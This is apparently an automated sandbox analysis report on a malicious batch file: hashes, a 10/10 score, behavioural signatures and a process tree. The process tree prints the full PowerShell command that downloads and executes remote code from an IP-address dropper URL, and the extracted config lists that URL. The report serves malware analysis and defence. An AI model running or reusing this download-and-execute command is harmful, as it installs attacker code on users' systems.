Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
25-03-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
3Nu9v5ZW.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
3Nu9v5ZW.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
3Nu9v5ZW.bat
-
Size
195B
-
MD5
eecd3a82bcdfa01935bc0d836b329a5b
-
SHA1
f26fe622fd6b58796dfb119d4d506758bb63f495
-
SHA256
ab52018e0d9d17dd67e02f4ce6525d4e846f14b36348aab1c7c837c0596ac433
-
SHA512
0842c48d0be5286338d2eee0e7af3643851758cd6504b4f4689b19d4ecc82c714ac7aa3c22f457c3dbe42e391b734949bed000fdbf206b8124367ec6ab0ec474
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/3Nu9v5ZW
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3876 3512 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3876 WerFault.exe Token: SeBackupPrivilege 3876 WerFault.exe Token: SeDebugPrivilege 3876 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe 3876 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3Nu9v5ZW.bat"1⤵PID:4024
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3Nu9v5ZW');Invoke-ZMQGDQFFVPNG;Start-Sleep -s 10000"2⤵PID:3512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 7003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3876